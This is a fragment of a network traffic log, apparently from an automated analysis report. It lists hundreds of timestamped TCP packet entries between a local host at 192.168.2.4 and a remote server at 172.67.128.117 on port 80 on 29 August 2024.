                                  Aug 29, 2024 23:42:06.009884119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009895086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009907007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009918928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009931087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009942055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009953976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009965897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009979963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.010055065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.010056019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.010056019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.014911890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.014978886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.014991045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.015036106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.098162889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.098367929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.098397017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.098408937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.098421097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.098454952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.098491907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.103102922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.103173971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.265620947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265633106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265667915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265711069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265722990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265780926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265793085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.265808105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.265808105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.265808105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.265836954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266518116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266570091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266607046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266653061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266654968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266705036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266793966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266836882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266869068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266880989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266921997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266935110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266947031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.266979933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.266993999 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.267632008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.267678976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.267690897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.267690897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.267735004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.267759085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.267769098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.267803907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.267822981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.268507004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.268547058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.268553972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.268564939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.268601894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.268610954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.268614054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.268644094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.268670082 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.269372940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.269385099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.269418955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.269432068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.270627022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.270636082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.270685911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354115963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354147911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354161024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354173899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354176044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354192972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354196072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354203939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354222059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354243040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354255915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354268074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354279041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354296923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354336023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354348898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354362011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354372025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.354393959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.354404926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523468971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523483038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523502111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523514986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523525000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523538113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523550034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523555994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523561954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523581982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523618937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523719072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523742914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523753881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523767948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523797035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523894072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523906946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523917913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523935080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.523946047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523974895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.523998022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524175882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524218082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524224043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524230957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524243116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524271965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524292946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524298906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524306059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524326086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524346113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524382114 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524457932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524470091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524480104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524499893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524508953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524512053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524527073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.524555922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.524585009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525068045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525088072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525099993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525119066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525146961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525190115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525199890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525209904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525222063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525243044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525270939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525302887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525315046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525358915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525618076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525636911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525649071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525661945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525690079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525762081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525774002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525784016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525796890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525815964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525839090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525926113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525938988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525949955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.525975943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.525995970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.526009083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.526021004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.526031971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.526035070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.526066065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.526094913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.526568890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.526618958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627619028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627640963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627654076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627751112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627762079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627772093 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627783060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627840996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627841949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627851963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627859116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627859116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627859116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627866983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627880096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627897978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627922058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.627959967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627971888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627981901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.627995014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628006935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628006935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628031015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628050089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628123045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628168106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628176928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628189087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628225088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628261089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628273010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628283978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628300905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628309011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628340006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628408909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628421068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628431082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628443956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628453970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628456116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628468037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628478050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628485918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628499985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628509045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628546953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628542900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628557920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628570080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628582001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.628593922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.628639936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779097080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779110909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779129028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779139042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779150009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779160023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779191971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779203892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779215097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779222012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779222012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779243946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779257059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.779942036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779954910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779964924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779978037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.779988050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780018091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780026913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780042887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780071020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780072927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780086040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780098915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780121088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780133963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780237913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780262947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780280113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780301094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780329943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780344963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780384064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780396938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780420065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780431032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780442953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780483961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780503035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780622005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780663967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780694008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780708075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780742884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780766010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780774117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780785084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780796051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780810118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780822992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780855894 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.780874014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780885935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.780926943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781212091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781255960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781264067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781275034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781302929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781303883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781331062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781352043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781428099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781481981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781491041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781502962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781537056 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781538963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781550884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.781580925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.781603098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783369064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783389091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783400059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783415079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783453941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783463001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783476114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783505917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783514023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783518076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783552885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783586025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783627033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783637047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783648014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783659935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783670902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783672094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783709049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783709049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783725977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783761024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784053087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784099102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784106970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784123898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784135103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784152985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784176111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784204960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784270048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784281015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784281015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784318924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784368038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784379959 CEST8049730172.67.128.117192.168.2.4
